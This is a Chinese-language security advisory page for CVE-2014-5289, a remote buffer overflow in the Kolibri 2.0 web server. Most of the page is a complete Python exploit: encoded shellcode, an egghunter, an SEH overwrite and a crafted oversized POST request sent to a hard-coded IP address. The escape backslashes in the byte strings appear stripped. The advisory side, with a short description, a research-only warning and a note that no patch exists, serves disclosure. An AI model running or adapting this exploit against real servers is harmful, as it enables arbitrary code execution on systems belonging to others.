Kolibri缓冲区溢出漏洞（CVE-2014-5289）

发布日期：2014-08-17更新日期：2014-08-19 受影响系统：SENKAS Kolibri WebServer 2.0SENKAS Kolibri WebServer描述：BUGTRAQ ID: 69263CVE（CAN） ID: CVE-2014-5289 Kolibri是简单HTTP服务器，支持静态Web内容，许可证书为GPL V3。 Kolibri 2.0及其他版本在处理超长的POST请求时存在远程缓冲区溢出漏洞，攻击者可利用此漏洞在受影响应用上下文中执行任意代码。 <*来源：tekwizz123 *> 测试方法：警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ ----------------------------------#！/bin/pythonimport socket #[*] x86/alpha_mixed succeeded with size 636 （iteration=1）buf = "x45x44x44x43x45x44x44x43" # TAGbuf += "x89xe5xdaxddxd9x75xf4x5fx57x59x49x49x49"buf += "x49x49x49x49x49x49x49x43x43x43x43x43x43"buf += "x37x51x5ax6ax41x58x50x30x41x30x41x6bx41"buf += "x41x51x32x41x42x32x42x42x30x42x42x41x42"buf += "x58x50x38x41x42x75x4ax49x49x6cx69x78x6e"buf += "x66x53x30x35x50x73x30x75x30x6dx59x4ax45"buf += "x35x61x4ex32x33x54x6cx4bx31x42x66x50x6c"buf += "x4bx62x72x34x4cx6cx4bx73x62x52x34x6ex6b"buf += "x72x52x61x38x46x6fx6cx77x51x5ax66x46x45"buf += "x61x59x6fx54x71x79x50x4cx6cx75x6cx50x61"buf += "x51x6cx65x52x34x6cx47x50x6fx31x4ax6fx64"buf += "x4dx57x71x6bx77x4ax42x7ax50x36x32x71x47"buf += "x6ex6bx56x32x36x70x4cx4bx53x72x55x6cx4c"buf += "x4bx50x4cx42x30x33x48x4bx53x32x6ax56x61"buf += "x4ax71x50x51x4cx4bx43x69x67x50x47x71x79"buf += "x43x6cx4bx31x59x62x38x68x63x77x4cx51x59"buf += "x6ex6bx75x64x6cx4bx36x61x6bx66x44x71x49"buf += "x6fx55x61x69x50x4ex4cx4bx71x38x4fx46x6d"buf += "x37x71x78x47x65x68x39x70x34x35x7ax54x47"buf += "x73x73x4dx79x68x37x4bx33x4dx64x64x70x75"buf += "x6ax42x56x38x6cx4bx72x78x75x74x53x31x4e"buf += "x33x50x66x4cx4bx54x4cx70x4bx6cx4bx36x38"buf += "x65x4cx33x31x4ex33x4ex6bx67x74x4cx4bx76"buf += "x61x48x50x6fx79x71x54x51x34x34x64x43x6b"buf += "x71x4bx73x51x53x69x32x7ax42x71x79x6fx4d"buf += "x30x42x78x43x6fx51x4ax6cx4bx37x62x58x6b"buf += "x6dx59x31x4dx45x38x70x33x74x72x63x30x67"buf += "x70x75x38x70x77x33x43x46x52x31x4fx42x74"buf += "x70x68x62x6cx63x47x65x76x56x67x6bx4fx4b"buf += "x65x6cx78x6ex70x76x61x45x50x37x70x45x79"buf += "x49x54x76x34x70x50x65x38x76x49x4bx30x52"buf += "x4bx45x50x49x6fx4bx65x46x30x50x50x70x50"buf += "x76x30x37x30x42x70x47x30x42x70x71x78x48"buf += "x6ax76x6fx4bx6fx49x70x39x6fx59x45x5ax37"buf += "x50x6ax63x35x71x78x4fx30x6fx58x65x6ex4f"buf += "x71x75x38x65x52x43x30x36x71x53x6cx6cx49"buf += "x4dx36x73x5ax44x50x43x66x43x67x32x48x6a"buf += "x39x49x35x62x54x63x51x59x6fx78x55x4fx75"buf += "x59x50x42x54x36x6cx6bx4fx32x6ex65x58x72"buf += "x55x7ax4cx30x68x38x70x58x35x6fx52x33x66"buf += "x6bx4fx58x55x70x6ax35x50x72x4ax76x64x63"buf += "x66x50x57x53x58x66x62x78x59x68x48x43x6f"buf += "x79x6fx7ax75x6cx4bx65x66x72x4ax73x70x65"buf += "x38x65x50x34x50x67x70x37x70x73x66x32x4a"buf += "x43x30x55x38x43x68x4dx74x31x43x4bx55x39"buf += "x6fx79x45x6ex73x42x73x31x7ax75x50x32x76"buf += "x76x33x43x67x51x78x56x62x49x49x39x58x61"buf += "x4fx69x6fx48x55x57x71x59x53x55x79x7ax66"buf += "x4fx75x79x66x70x75x68x6cx4ax63x41x41" egghunter = "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x45x44x44x43x8bxfaxafx75xeaxafx75xe7xffxe7" overflow = "A" * 12overflow += "A" * （790 - len（overflow） - len（egghunter））overflow += egghunteroverflow += "xEBxD9" # This offset seems to work against Windows 7 Professional, fully updated as of August 5th, 2014overflow += "A" * 2overflow += "x50x45x62" #SEH overwrite 00624550 aka pop pop ret from the binary itself. # A lot of this is the same as exploit 34059 from exploit-db buffer = "POST /" + overflow + " HTTP/1.1 "buffer += "User-Agent: Wget/1.13.4 "buffer += "Host: " + buf + " "buffer += "Accept: */* "buffer += "Connection: Keep-Alive "buffer += "Content-Type: application/x-www-form-urlencoded "buffer += "Content-Length: 4"buffer += " "buffer += "licenseID=string&content=string&paramsXML=string" handle = socket.socket（socket.AF_INET, socket.SOCK_STREAM）handle.connect（（"192.168.62.130", 8080））handle.send（buffer）handle.close（）建议：厂商补丁： SENKAS------目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.senkas.com/kolibri/FFmpeg "libavcodec/iff.c" 内存破坏漏洞QEMU "vmstate_xhci_event"字段内存破坏漏洞相关资讯本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任
本站管理人员有权保留或删除其管辖留言中的任意内容
本站有权在网站内转载或引用您的评论
参与本评论即表明您已经阅读并接受上述条款